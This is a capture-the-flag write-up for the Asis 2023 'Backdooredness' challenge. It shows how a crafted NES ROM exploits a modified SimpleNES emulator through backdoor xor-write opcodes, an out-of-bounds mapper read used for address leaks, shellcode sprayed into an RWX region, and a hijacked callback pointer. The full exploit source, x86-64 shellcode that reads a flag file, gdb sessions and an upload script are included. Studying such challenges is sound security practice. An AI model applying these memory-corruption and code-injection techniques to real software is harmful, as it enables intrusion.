Backdooredness Asis 2023
Introduction⌗
Last weekend, I participated in Asis CTF. While I did not manage to solve this challenge during competition time, I did manage to up solve it with some limited help from the author!
Credits⌗
During the CTF I made the mistake of primarily trying to write my exploit in assembly. This is obviously not ideal in retrospect, as using a high level language like C takes away the responsibility of managing the stack, and gives me access to 32bit integer types. The player that solved the challenge, ptr-yudai, posted their solution, and I in turn used some of the helper functions they had made. However, my exploitation method, and vulnerability were different. Since I used some of their code and templating, I wanted to give credit where it is due! Please check out their amazing blog @ https://ptr-yudai.hatenablog.com/
About⌗
This challenge involves exploiting a NES emulator called SimpleNES. In addition to the standard source code, there is the addition of 2 opcodes, bka and bkx, as well as a 64bit register bk_off. The language for the NES is 6502 assembly, which consists of several 8bit registers, of chief concern being AC(r_A), the accumulator. For more information, the language spec is detailed here.
The challenge consists of creating a ROM that exploits the Emulator. Once the ROM has been submitted, no further action is allowed from the client side. In other words, everything has to be handled by the ROM. Something I later realized is that stdin is also closed, making any kind of input impossible.
//CPU.cpp
case BKA:
bk_off = (bk_off << 8) + r_A;
break;
case BKX:
m_bus.xorAt(bk_off, r_A);
break;
void MainBus::xorAt(uint64_t off, Byte value)
{
// Exfil the byte and hide the output from user
syscall(STDOUT_FILENO,1,(void *)&m_RAM[off],1);
syscall(STDOUT_FILENO,1,(void *)"\r",1);
m_RAM[off] ^= value;
}
The bka opcode shifts the bk_off registers left by 8 bits, and appends the AC register to the end. The bkx opcode triggers a call the the MainBus’s xorAt function which xor’s the memory at address m_ram+bk_off by the value in AC. It also leaks the value back to the user, but not the ROM. These 2 are combined to give an arbitrary write primitive.
Trigger vuln from ROM⌗
;pwn_asm.s
.export _bka
.export _bkx
_bka:
.byte $13
rts
_bkx:
.byte $37
rts
//pwn.c
extern void bka(uint8_t a);
extern void bkx(uint8_t a);
void reset() {
//bka(0); bka(0); bka(0); bka(0);
bka(0); bka(0); bka(0); bka(0);
}
void xorAt64(uint32_t ofs_low, uint32_t ofs_high, uint8_t value) {
int i;
for (i = 0; i < 4; i++) bka((ofs_high >> ((3-i)*8)) & 0xff);
for (i = 0; i < 4; i++) bka((ofs_low >> ((3-i)*8)) & 0xff);
bkx(value);
reset();
}
void xorAt(uint32_t offset, uint8_t value) {
int i;
for (i = 0; i < 4; i++) bka((offset >> ((3-i)*8)) & 0xff);
bkx(value);
reset();
}
Constraints⌗
While we do get to write anywhere, there is no given way to leak addresses into the ROM memory. This is necessary to write to higher addresses. This will be addressed later.
compiling the ROM⌗
the ROM can be compiled with the cc65 package. I used the following makefile to build it. (Thanks again to ptr-yudai for helping me figure out how to get C compilation working)
all:
cc65 -O -t c64 pwn.c
ca65 -t c64 pwn.s
ca65 -t c64 pwn_asm.s
cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o
Attack Vector⌗
To start out with, I wanted to discuss my chosen attack vector. I noticed that for reading and writing special physical address’s, a series of callbacks were created. This struck me as a solid target, because overwriting one should give me a way to trigger code!
Callback assignment⌗
Emulator::Emulator() :
m_cpu(m_bus),
m_ppu(m_pictureBus, m_emulatorScreen),
m_screenScale(3.f),
m_cycleTimer(),
m_cpuCycleDuration(std::chrono::nanoseconds(559))
{
if(!m_bus.setReadCallback(PPUSTATUS, [&](void) {return m_ppu.getStatus();}) ||
!m_bus.setReadCallback(PPUDATA, [&](void) {return m_ppu.getData();}) ||
!m_bus.setReadCallback(JOY1, [&](void) {return m_controller1.read();}) ||
!m_bus.setReadCallback(JOY2, [&](void) {return m_controller2.read();}) ||
!m_bus.setReadCallback(OAMDATA, [&](void) {return m_ppu.getOAMData();}))
{
LOG(Error) << "Critical error: Failed to set I/O callbacks" << std::endl;
}
if(!m_bus.setWriteCallback(PPUCTRL, [&](Byte b) {m_ppu.control(b);}) ||
!m_bus.setWriteCallback(PPUMASK, [&](Byte b) {m_ppu.setMask(b);}) ||
!m_bus.setWriteCallback(OAMADDR, [&](Byte b) {m_ppu.setOAMAddress(b);}) ||
!m_bus.setWriteCallback(PPUADDR, [&](Byte b) {m_ppu.setDataAddress(b);}) ||
!m_bus.setWriteCallback(PPUSCROL, [&](Byte b) {m_ppu.setScroll(b);}) ||
!m_bus.setWriteCallback(PPUDATA, [&](Byte b) {m_ppu.setData(b);}) ||
!m_bus.setWriteCallback(PUTC, [&](Byte b) {putchar(b);}) ||
!m_bus.setWriteCallback(OAMDMA, [&](Byte b) {DMA(b);}) ||
!m_bus.setWriteCallback(JOY1, [&](Byte b) {m_controller1.strobe(b); m_controller2.strobe(b);}) ||
!m_bus.setWriteCallback(OAMDATA, [&](Byte b) {m_ppu.setOAMData(b);}))
{
LOG(Error) << "Critical error: Failed to set I/O callbacks" << std::endl;
}
m_ppu.setInterruptCallback([&](){ m_cpu.interrupt(InterruptType::NMI); });
}
So, I decided to check this out with a debugger. As a quick aside, for debugging these challenges where a dockerfile is provided, I like to modify it to install git, gdb, and vim and debug from within the docker instance. Sometimes I debug locally as well, but for the most part I think it is better to stay true to environment as much as possible.
ROM script to debug⌗
//JOY1 = 0x4016
void debug(){
while(1) *(uint8_t*)JOY1 = 1;
}
int main(void) {
debug();
}
All this does is loop a write call to JOY1, this will allow me to test my attack idea.
I found the callback list in memory by using the information provided. By searching for the pointer to m_ram I can find the MainBus allocation, which has a pointer to the callback table
gdb-peda$ find 0x5555570e1220
Searching for '0x5555570e1220' in: None ranges
Found 1 results, display max 1 items:
[stack] : 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
gdb-peda$ x/10gx 0x7ffdb5a026d0
0x7ffdb5a026d0: 0x00005555570e1220 0x00005555570e1a20
0x7ffdb5a026e0: 0x00005555570e1a20 0x00005555574e1bf0
0x7ffdb5a026f0: 0x00005555574e3bf0 0x00005555574e3bf0
0x7ffdb5a02700: 0x00005555571840a0 0x00005555574dc170
0x7ffdb5a02710: 0x000000000000000d 0x00005555574dc3e0
gdb-peda$ x/10gx 0x00005555574dc3e0
0x5555574dc3e0: 0x00005555574dc3a0 0x00007ffb00002004
0x5555574dc3f0: 0x00007ffdb5a026d0 0x0000000000000000
0x5555574dc400: 0x00007ffbceb8d3d8 0x00007ffbceb8d396
0x5555574dc410: 0x00005555574d9d80 0x0000000000000031
0x5555574dc420: 0x706d742f706d742f 0x6b6d6f3533763835
gdb-peda$ x/10gx 0x00005555574dc3a0
0x5555574dc3a0: 0x00005555574dc360 0x00007ffb00004016 <- addr 0x4016!
0x5555574dc3b0: 0x00007ffdb5a026d0 0x0000000000000000
0x5555574dc3c0: 0x00007ffbceb8d2c9 0x00007ffbceb8d287 <- function ptrs
0x5555574dc3d0: 0x00005555574d9d40 0x0000000000000041
0x5555574dc3e0: 0x00005555574dc3a0 0x00007ffb00002004
To test my Idea, I just need to change the function pointers to joke values
gdb-peda$ set *0x5555574dc3c0 = 0x4141414141
gdb-peda$ set *0x5555574dc3c4 = 0x4141414141
gdb-peda$ set *0x5555574dc3c8 = 0x4242424242
gdb-peda$ set *0x5555574dc3cc = 0x4242424242
gdb-peda$ x/10gx 0x00005555574dc3a0
0x5555574dc3a0: 0x00005555574dc360 0x00007ffb00004016
0x5555574dc3b0: 0x00007ffdb5a026d0 0x0000000000000000
0x5555574dc3c0: 0x4141414141414141 0x4242424242424242
0x5555574dc3d0: 0x00005555574d9d40 0x0000000000000041
0x5555574dc3e0: 0x00005555574dc3a0 0x00007ffb00002004
Since, I am looping over a write to JOY1, let see if continuing gives a crash.
gdb-peda$ c
Continuing.
Thread 1 "ld-linux-x86-64" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
RBX: 0x4242424242424242 ('BBBBBBBB')
RCX: 0x5555574dc3a8 --> 0x7ffb00004016
RDX: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
RSI: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
RDI: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
RBP: 0x7ffdb5a01de0 --> 0x7ffdb5a01e20 --> 0x7ffdb5a01e70 --> 0x7ffdb5a01eb0 --> 0x7ffdb5a01f70 --> 0x7ffdb5a02bb0 (--> ...)
RSP: 0x7ffdb5a01dc0 --> 0x7f01b5a01de0
RIP: 0x7ffbceb96de4 (call rbx)
R8 : 0xff
R9 : 0x7ffb910f2010 --> 0x0
R10: 0x7ffdb5a01e90 --> 0x8d007ffdb5a02840
R11: 0x7ffdb5b8c080 (MemError)
R12: 0x1
R13: 0x7ffbceb80f29 (endbr64)
R14: 0x7ffbcebb7310 --> 0x7ffbceb80ee0 (endbr64)
R15: 0x7ffbcebf3040 --> 0x7ffbcebf42f0 --> 0x7ffbceb5d000 --> 0x10102464c457f
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffbceb96dda: mov rax,QWORD PTR [rbp-0x18]
0x7ffbceb96dde: mov rsi,rdx
0x7ffbceb96de1: mov rdi,rax
=> 0x7ffbceb96de4: call rbx
0x7ffbceb96de6: nop
0x7ffbceb96de7: mov rbx,QWORD PTR [rbp-0x8]
0x7ffbceb96deb: leave
0x7ffbceb96dec: ret
Guessed arguments:
arg[0]: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
arg[1]: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
arg[2]: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
[------------------------------------stack-------------------------------------]
0000| 0x7ffdb5a01dc0 --> 0x7f01b5a01de0
0008| 0x7ffdb5a01dc8 --> 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
0016| 0x7ffdb5a01dd0 --> 0x7ffdb5a01e10 --> 0x0
0024| 0x7ffdb5a01dd8 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
0032| 0x7ffdb5a01de0 --> 0x7ffdb5a01e20 --> 0x7ffdb5a01e70 --> 0x7ffdb5a01eb0 --> 0x7ffdb5a01f70 --> 0x7ffdb5a02bb0 (--> ...)
0040| 0x7ffdb5a01de8 --> 0x7ffbceb95d04 (jmp 0x7ffbceb96013)
0048| 0x7ffdb5a01df0 --> 0x4016b5a01e01
0056| 0x7ffdb5a01df8 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffbceb96de4 in ?? ()
gdb-peda$
Perfect, SEGFAULT on a call to rbx with the injected value inside. Proving the exploitation vector’s validity.
Bad News⌗
Since I have no way to leak any values, there is really nothing of use I can put in here quite yet. I looked for awhile to see if there were any gadgets I could use that only relied on the lower 12 bits to be changed, but couldn’t find anything. This is were I got stuck during the CTF. I tried many things revolving reading from MainBus memory, but got nowhere. I knew I needed the leak, but couldn’t find it…
Dream Come True⌗
After a long night filled with restless thoughts of a challenge yet completed, I awoke to a joyous sight. In addition to some details from the only person who solved the challenge, ptr-yudai, the challenge author said, Intended way to get leaks was using oob in dream memory handler. It doesn't bound check its x * 0x2000+y
. So, I set forth on a mission to figure out how to get the leaks from this.
I found the vulnerable code segment which matches the description in readCHR.
//MapperColorDreams.cpp
Byte MapperColorDreams::readCHR(Address address)
{
if (address <= 0x1FFF)
{
return m_cartridge.getVROM()[(chrbank * 0x2000) + address];
}
return 0;
}
MapperColorDreams class⌗
class MapperColorDreams : public Mapper
{
public:
MapperColorDreams(Cartridge &cart, std::function<void(void)> mirroring_cb);
NameTableMirroring getNameTableMirroring();
void writePRG(Address address, Byte value);
Byte readPRG(Address address);
Byte readCHR(Address address);
void writeCHR(Address address, Byte value);
private:
NameTableMirroring m_mirroring;
uint32_t prgbank;
uint32_t chrbank; //<- value used for calculating the chrbank offset
std::function<void(void)> m_mirroringCallback;
};
The Cartridge mapper is select at runtime based on the ROM header. If a value of 11, 0xb, is specified, on creation of the mapper this mapper will be chosen. I set this value in python before uploading the ROM
upload.py⌗
r = remote("localhost", 1337)
with open("./pwn.nes", "rb") as f:
data = list(f.read())
#patch in dream mapper
data[6] = (data[6] & 0x0f) | (11 << 4)
to_send = hexlify(bytes(data))
#log.info(f"sending data> {to_send}")
r.sendlineafter(':\n', to_send)
with open("./test.nes", "wb") as out:
out.write(bytes(data))
f.close()
A key thing to note is that the Mapper is dynamically allocated. This can be confirmed by looking at the disassembly. See the operator.new() call
Bug⌗
the OOB is pretty simple, by corrupting the chrbank value on the heap using our write primitive, we can the read outside of the allocated CHR memory. All that is needed is the offset to the heap object for the dream mapper, and then the xor primitive can be used to set chrbank to whatever we want. In this case 1 will suffice.
xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
The next step is to read from chr memory, which can be done like this
uint8_t get_data(uint16_t addr){
//write the address to PPUADDR
uint8_t a = (addr >> 8) & 0xff, b = addr &0xff;
*(uint8_t*)(PPUADDR) = a;
*(uint8_t*)(PPUADDR) = b;
//read the value at chrbank+addr and return
return *(uint8_t*)PPUDATA;
}
//helper function to handle leaking
void leak(uint16_t offset, uint32_t* high, uint32_t* low){
uint8_t i = 0;
get_data(0);
for(i = 0; i < 4; i++)
*low |= (uint32_t)get_data(offset+i+1)<<(i*8);
for(i = 0; i < 4; i++)
*high |= (uint32_t)get_data(offset+i+5)<<(i*8);
get_data(0);
}
Next, calculate the addresses for the values to be leaked. In my case, I chose 2 values, ld and heap. I will explain my choice in the next section.
leak vals⌗
uint32_t rwx_low, rwx_high;
uint32_t mram_low, mram_high;
rwx_low = rwx_high = 0;
//ld
leak(LD_OFF, &rwx_high, &rwx_low);
rwx_low -= RWX_OFF;
rwx_low &= 0xFFFFFF00;
mram_low = mram_high = 0;
//heap
leak(HEAP_OFF, &mram_high, &mram_low);
mram_low -= M_RAM_OFF; //set the heap leak to m_RAM
What I missed⌗
The key thing I missed during the competition was the presence of the PPU and PictureBus. I will leave it you to review the source code and figure out what they do, but the important thing is that they provide another way to read memory. During the CTF I searched for bugs in the MainBus, overlooking CHR memory entirely. Had I looked a bit closer at the read/write callbacks I had access too I might have noticed the PPUADDR and PPUDATA callbacks. Thus, my resolution for 2024 is to read more source code!
RWX⌗
One thing I noticed while poking around with the debugger is that there is a RWX segment of memory in ld. As discussed before, I can overwrite the callback function for JOY1 to call anywhere I want, so why not call some shellcode? This is exactly what I ended up doing.
To do this, I will use the aforementioned xorAt function to write the shellcode to the section. for this, I need to calculate the offset between RAM and RWX.
uint32_t mram_rwx_off_low, mram_rwx_off_high;
sub64(rwx_low, rwx_high, mram_low, mram_high, &mram_rwx_off_low, &mram_rwx_off_high);
next, I write the shellcode to this offset, there is some existing data there, but it is easy enough to handle. The data is always the same, so I can xor my shellcode against the data before sending it.
uint8_t i,j;
for(i = 0; i < SHELLCODE_SZ; i++)
shellcode[i] ^= pattern[i%0x10];
//create nopsled
for(i = 0; i < 0x10; i++)
pattern[i] ^= 0x90;
//sometimes values are slightly different, so I spray a few times
for(j = 0; j < SPRAY_CNT;j++){
for(i = 0; i < 0xb0; i++){
xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, pattern[i%0x10]);
}
mram_rwx_off_low+= 0xb0;
//write shellcode
for(i = 0; i < SHELLCODE_SZ; i++)
xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, shellcode[i]);
mram_rwx_off_low += 0x50;
}
mram_rwx_off_low -= SPRAY_CNT*0x100;
shellcode⌗
0: 48 31 d2 xor rdx,rdx
3: 48 31 c0 xor rax,rax
6: 48 31 f6 xor rsi,rsi
9: 48 bb 6c 6f 6c 6c 6f movabs rbx,0x746c6c6f6c6c6f6c ;'lollollt'
10: 6c 6c 74
13: 48 c1 eb 38 shr rbx,0x38
17: 53 push rbx
18: 48 bb 2f 66 6c 61 67 movabs rbx,0x78742e67616c662f ;'/flag.txt'
1f: 2e 74 78
22: 53 push rbx
23: 48 89 e7 mov rdi,rsp
26: b0 02 mov al,0x2
28: 0f 05 syscall ;int fd = open('/flag.txt', O_RDONLY, 0);
2a: 48 89 c7 mov rdi,rax
2d: 48 31 c0 xor rax,rax
30: 48 89 e6 mov rsi,rsp
33: ba 00 01 00 00 mov edx,0x100
38: 0f 05 syscall ;read(fd, &rsp, 0x100);
3a: 48 89 c2 mov rdx,rax
3d: b8 01 00 00 00 mov eax,0x1
42: bf 01 00 00 00 mov edi,0x1
47: 0f 05 syscall ;write(STDOUT, &rsp, 0x100);
//aligned to 0x10, necessary
uint8_t shellcode[] = { 0x90,
0x48,0x31,0xd2,0x48,0x31,0xc0,0x48,0x31,
0xf6,0x48,0xbb,0x6c,0x6f,0x6c,0x6c,0x6f,
0x6c,0x6c,0x74,0x48,0xc1,0xeb,0x38,0x53,
0x48,0xbb,0x2f,0x66,0x6c,0x61,0x67,0x2e,
0x74,0x78,0x53,0x48,0x89,0xe7,0xb0,0x02,
0x0f,0x05,0x48,0x89,0xc7,0x48,0x31,0xc0,
0x48,0x89,0xe6,0xba,0x00,0x01,0x00,0x00,
0x0f,0x05,0x48,0x89,0xc2,0xb8,0x01,0x00,
0x00,0x00,0xbf,0x01,0x00,0x00,0x00,0x0f,
0x05,0x00,0x00,0x00,0x00,0x00,0x00,};
uint8_t pattern[] = {0x64,0x4c,0x8b,0x1c,0x25,0x28,0xff,0xff,0xff,0x41,0xff,0xa3,0x18,0x3c,0x00,0x00}; //the bytes found in libc
Last Step⌗
All that is left is to overwrite the JOY1 callback function with the address of the shellcode. This is easier than one may expect, as the LD library is located right next to the Main Binary for SimpleNES. So, the address of the callback function can be computed based off previously leaked RWX address. From there, I xor the function pointer against the shellcode address, and use the xorAt primitive to corrupt the callback function for JOY1 write!
uint32_t joycon_cb_fn_low, overwrite;
overwrite = rwx_low;
joycon_cb_fn_low = rwx_low - JOYCON_CB_RWX_DIFF;
overwrite ^= joycon_cb_fn_low;
overwrite |= 0x800;
for(i = 0; i < 4; i++)
xorAt64(FUNC_OVERWRITE_OFF+i, 0, (overwrite >> (i*8)) & 0xFF);
And that’s it! all that’s left to do is call the callback for JOY1 and enjoy our code execution.
*(uint8_t*)JOY1 = i;
while(1);
return 0;
Moment of Truth⌗
[gold3nboy@arch exp]$ ./upload.py
cc65 -O -t c64 pwn.c
ca65 -t c64 pwn.s
ca65 -t c64 pwn_asm.s
cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o
[+] Opening connection to localhost on port 1337: Done
/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
[MainBus.cpp:12] Allocated m_RAM at: 0x555556100220
[Cartridge.cpp:52] Reading ROM from path: /tmp/tmpmctjnwke
[Cartridge.cpp:70] Reading header, it dictates:
[Cartridge.cpp:73] 16KB PRG-ROM Banks: 2
[Cartridge.cpp:81] 8KB CHR-ROM Banks: 1
[Cartridge.cpp:91] Name Table Mirroring: Vertical
[Cartridge.cpp:95] Mapper #: 11
[Cartridge.cpp:98] Extended (CPU) RAM: true
[Cartridge.cpp:112] ROM is NTSC compatible.
[Cartridge.cpp:121] Allocated m_PRG_ROM at: 0x555556502bd0
[Cartridge.cpp:127] Allocated m_CHR_ROM at: 0x55555650abe0
Error while enumerating udev devices
Setting vertical sync not supported
\x00
[*] rwx: 0x7faf77a11a00
[*] m_RAM: 0x555556100220
[*] m_RAM_rwx_off: 0x2a5a219117e0
[*] Switching to interactive mode
GGGGGASIS{test-flag}
One more thing, a shell can not be spawned as stdin is closed. It could be reopened, but I decided to just read and write the flag with shellcode instead. There is plenty of space to do whatever in the shellcode, so I’ll leave that to you.
Aside⌗
Due to not know the heap layout on the remote server, I have been unable to get my exploit working on remote. I have tried dumping the entire heap, but can’t find where the Mapper is being allocated too(I searched manually as well for a long time). If anyone has any advice for this, I’d love to hear it. For now, I am content with getting my exploit working on my local docker instance, as I feel I have completed the challenge.
Aside-Aside⌗
After I had given up, I finally had the idea to set if I could set chrbank some other way. It turns out I can, and I was being stubborn trying to find the heap allocation for the way I had working, when setting the value as intended is much easier. There is only one real change.
//xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
*(uint8_t*)0x9001 = 0x10; //write 0x10 to an address above 0x8000
//this is the code that is triggered
void MapperColorDreams::writePRG(Address address, Byte value)
{
if (address >= 0x8000)
{
prgbank = ((value >> 0) & 0x3);
chrbank = ((value >> 4) & 0xF);
}
}
From there, I just had to calculate the offsets for the function pointer and the heap and change them.
Flag: ASIS{e8a46ded54d3acec15419e6b09818901}
Another good lesson in thinking about all possible attack patterns, instead of focusing on the first one I find.
Summary⌗
What I learned⌗
I learned a bit about how some addresses are considered special by CPU’s and trigger bus write’s and read’s. This is something I want to dig more into, as was cool to see it in action. I also learned a lot about the 6502 instruction architecture which was surprisingly interesting. It’s crazy how much computers have improved over the last 40 years.
Most importantly, I learned to check for all possible read’s and write’s, instead of focusing only on what’s readily available. If I had spent more time looking at the PPU, I think I may have been able to find the OOB read. In reality, I hardly glanced at the Cartridge mappers during the competition time.
Overall I really enjoyed the challenge, and it was also fun to continue working on it after the CTF had finished!
FULL CODE⌗
#include <stdint.h>
extern void bka(uint8_t a);
extern void bkx(uint8_t a);
#define REMOTE
#define HEAP_LIBC_PAGE 0x4
#define HEAP_LIBC_OFF 0x1E50
#ifdef REMOTE
#define M_RAM_OFF 0x551f0
#define FUNC_OVERWRITE_OFF 0x3EB9D8
#endif
#ifndef REMOTE
#define M_RAM_OFF 0x553e0
#define FUNC_OVERWRITE_OFF 0x3FB108
#endif
#define DREAM_OFF 0xA2D60
#define LD_PAGE 0x1
#define LD_OFF 0x3f0
#define HEAP_OFF 0x3d0
#define RWX_OFF 0x3000
#define LIBC_OFF 0x217000
#define SYSTEM_OFF 0x28670
#define JOYCON_CB_RWX_DIFF 0x62D79
#define SHELLCODE_SZ 0x4a
#define SPRAY_CNT 3
enum IORegisters
{
PPUCTRL = 0x2000,
PPUMASK,
PPUSTATUS,
OAMADDR,
OAMDATA,
PPUSCROL,
PPUADDR,
PPUDATA,
OAMDMA = 0x4014,
PUTC = 0x4015,
JOY1 = 0x4016,
JOY2 = 0x4017,
};
/*[*] 0x30: 0x00007f69a1cdc3e8 0x00007ffe928407e0
[*] 0x40: 0x000000010000000b 0x0000000000000000
[*] 0x50: 0x00007ffe92840610 0x0000000000000000
[*] 0x60: 0x00007f69a1cb26b4 0x00007f69a1cb268d
*/
/*
0000000000000000 <_start>:
0: 48 31 d2 xor %rdx,%rdx
3: 48 31 c0 xor %rax,%rax
6: 48 31 f6 xor %rsi,%rsi
9: 48 bb 6c 6f 6c 6c 6f movabs $0x746c6c6f6c6c6f6c,%rbx
10: 6c 6c 74
13: 48 c1 eb 38 shr $0x38,%rbx
17: 53 push %rbx
18: 48 bb 2f 66 6c 61 67 movabs $0x78742e67616c662f,%rbx
1f: 2e 74 78
22: 53 push %rbx
23: 48 89 e7 mov %rsp,%rdi
26: b0 02 mov $0x2,%al
28: 0f 05 syscall
2a: 48 89 c7 mov %rax,%rdi
2d: 48 31 c0 xor %rax,%rax
30: 48 89 e6 mov %rsp,%rsi
33: ba 00 01 00 00 mov $0x100,%edx
38: 0f 05 syscall
3a: 48 89 c2 mov %rax,%rdx
3d: b8 01 00 00 00 mov $0x1,%eax
42: bf 01 00 00 00 mov $0x1,%edi
47: 0f 05 syscall
*/
//aligned to 0x10, necessary
uint8_t shellcode[] = { 0x90,
0x48,0x31,0xd2,0x48,0x31,0xc0,0x48,0x31,
0xf6,0x48,0xbb,0x6c,0x6f,0x6c,0x6c,0x6f,
0x6c,0x6c,0x74,0x48,0xc1,0xeb,0x38,0x53,
0x48,0xbb,0x2f,0x66,0x6c,0x61,0x67,0x2e,
0x74,0x78,0x53,0x48,0x89,0xe7,0xb0,0x02,
0x0f,0x05,0x48,0x89,0xc7,0x48,0x31,0xc0,
0x48,0x89,0xe6,0xba,0x00,0x01,0x00,0x00,
0x0f,0x05,0x48,0x89,0xc2,0xb8,0x01,0x00,
0x00,0x00,0xbf,0x01,0x00,0x00,0x00,0x0f,
0x05,0x00,0x00,0x00,0x00,0x00,0x00,};
uint8_t pattern[] = {0x64,0x4c,0x8b,0x1c,0x25,0x28,0xff,0xff,0xff,0x41,0xff,0xa3,0x18,0x3c,0x00,0x00}; //the bytes found in libc
void reset() {
//bka(0); bka(0); bka(0); bka(0);
bka(0); bka(0); bka(0); bka(0);
}
void sub64(uint32_t al, uint32_t ah, uint32_t bl, uint32_t bh,
uint32_t *xl, uint32_t *xh) {
*xl = al - bl;
if (al < bl) {
*xh = ah - bh - 1;
} else {
*xh = ah - bh;
}
}
void xorAt64(uint32_t ofs_low, uint32_t ofs_high, uint8_t value) {
int i;
for (i = 0; i < 4; i++) bka((ofs_high >> ((3-i)*8)) & 0xff);
for (i = 0; i < 4; i++) bka((ofs_low >> ((3-i)*8)) & 0xff);
bkx(value);
reset();
}
void xorAt(uint32_t offset, uint8_t value) {
int i;
for (i = 0; i < 4; i++) bka((offset >> ((3-i)*8)) & 0xff);
bkx(value);
reset();
}
void putchar(uint8_t c) {
*(uint8_t*)(0x4015) = c;
}
uint8_t get_data(uint16_t addr){
uint8_t a = (addr >> 8) & 0xff, b = addr &0xff;
*(uint8_t*)(PPUADDR) = a;
*(uint8_t*)(PPUADDR) = b;
return *(uint8_t*)PPUDATA;
}
//void set_ppu_data(uint8_t chef){
// *(uint8_t*)PPUDATA = chef;
//}
//
//uint8_t libc_addr[8];
void leak(uint16_t offset, uint32_t* high, uint32_t* low){
uint8_t i = 0;
get_data(0);
for(i = 0; i < 4; i++)
*low |= (uint32_t)get_data(offset+i+1)<<(i*8);
for(i = 0; i < 4; i++)
*high |= (uint32_t)get_data(offset+i+5)<<(i*8);
get_data(0);
}
void log64(uint32_t high, uint32_t low){
uint8_t i = 0;
putchar(0x46);
putchar(0x46);
for(i = 0; i < 4; i++)
putchar((low >> (i*8)) & 0xFF);
for(i = 0; i < 4; i++)
putchar((high >> (i*8)) & 0xFF);
putchar(0x41);
putchar(0x42);
putchar(0x43);
}
void dump(uint32_t base){
uint8_t i;
for(i = 0; i < 0xff; i++){
xorAt(base+i, 0);
}
xorAt(base+0xff, 0);
}
void debug(){
while(1) *(uint8_t*)JOY1 = 1;
}
void redemption(){
*(uint8_t*)0x9001 = 0x10;
}
int main(void) {
uint32_t rwx_low, rwx_high;
uint32_t mram_low, mram_high;
uint32_t mram_rwx_off_low, mram_rwx_off_high;
uint32_t joycon_cb_fn_low, overwrite;
uint8_t i,j;
//debug();
//xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
redemption();
rwx_low = rwx_high = 0;
leak(LD_OFF, &rwx_high, &rwx_low);
rwx_low -= RWX_OFF;
rwx_low &= 0xFFFFFF00;
mram_low = mram_high = 0;
leak(HEAP_OFF, &mram_high, &mram_low);
mram_low -= M_RAM_OFF; //set the heap leak to m_RAM
log64(rwx_high, rwx_low);
log64(mram_high, mram_low);
sub64(rwx_low, rwx_high, mram_low, mram_high, &mram_rwx_off_low, &mram_rwx_off_high);
log64(mram_rwx_off_high, mram_rwx_off_low);
//prep shellcode with the pattern found at rwx section
for(i = 0; i < SHELLCODE_SZ; i++)
shellcode[i] ^= pattern[i%0x10];
//create nop
for(i = 0; i < 0x10; i++)
pattern[i] ^= 0x90;
for(j = 0; j < SPRAY_CNT;j++){
for(i = 0; i < 0xb0; i++){
xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, pattern[i%0x10]);
}
mram_rwx_off_low+= 0xb0;
//write shellcode
for(i = 0; i < SHELLCODE_SZ; i++)
xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, shellcode[i]);
mram_rwx_off_low += 0x50;
}
mram_rwx_off_low -= SPRAY_CNT*0x100;
//for finding Mapper allocation on blind remote
#ifdef DUMP
putchar(0x44);
putchar(0x44);
for(i = 0; i < 8; i++)
dump(FUNC_OVERWRITE_OFF + i*0x100);
putchar(0x45);
putchar(0x45);
#endif
//overwrite callback function
overwrite = rwx_low;
joycon_cb_fn_low = rwx_low - JOYCON_CB_RWX_DIFF;
overwrite ^= joycon_cb_fn_low;
overwrite |= 0x800;
for(i = 0; i < 4; i++)
xorAt64(FUNC_OVERWRITE_OFF+i, 0, (overwrite >> (i*8)) & 0xFF);
putchar(0x47);
putchar(0x47);
putchar(0x47);
putchar(0x47);
putchar(0x47);
//trigger
*(uint8_t*)JOY1 = i;
while(1);
return 0;
}
.export _bka
.export _bkx
.export _nop
_bka:
.byte $13
rts
_bkx:
.byte $37
rts
_nop:
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
rts
section .text
global _start
_start:
;rd_only
xor rdx, rdx
xor rax, rax
xor rsi, rsi
mov qword rbx, 'lollollt'
shr rbx, 0x38
push rbx
mov qword rbx, '/flag.tx'
push rbx
;filename now in rdi
mov rdi, rsp
mov al, 0x2
syscall
mov rdi, rax
xor rax, rax
mov rsi, rsp
mov rdx, 0x100
syscall
mov rdx, rax
mov rax, 1
;stdout
mov rdi, 1
syscall
all:
cc65 -O -t c64 pwn.c
ca65 -t c64 pwn.s
ca65 -t c64 pwn_asm.s
cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o
#!/usr/bin/env python
from pwn import *
from binascii import hexlify
import os
stop = 0x3F3280
offset = 0x3A0000 #checked up to 0x100000 on remote
r = 0
def spawn_remote():
global r
#r = remote("91.107.157.58", 3000)
r = remote("localhost", 1337)
def leak():
data = r.recvuntil(b"FF", drop=True).decode("utf-8").strip()
if data:
print(data)
data = r.recvuntil(b"ABC",drop=True)
return u64(data)
def dump():
i = 0
